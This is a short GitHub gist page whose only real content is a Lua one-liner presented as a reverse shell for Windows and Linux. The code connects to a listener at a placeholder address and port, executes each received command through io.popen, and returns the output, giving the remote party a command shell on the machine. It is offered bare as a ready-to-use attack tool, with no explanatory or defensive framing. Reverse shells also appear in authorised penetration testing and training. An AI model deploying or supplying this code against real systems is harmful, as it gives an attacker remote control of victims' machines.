Skip to content

Instantly share code, notes, and snippets.

@cldrn
Created October 8, 2018 21:24
Show Gist options
  • Star 9 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save cldrn/372b31c90d7f88be9020020b8e534dc4 to your computer and use it in GitHub Desktop.
Save cldrn/372b31c90d7f88be9020020b8e534dc4 to your computer and use it in GitHub Desktop.
Reverse Shell For Windows and Linux in Lua
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment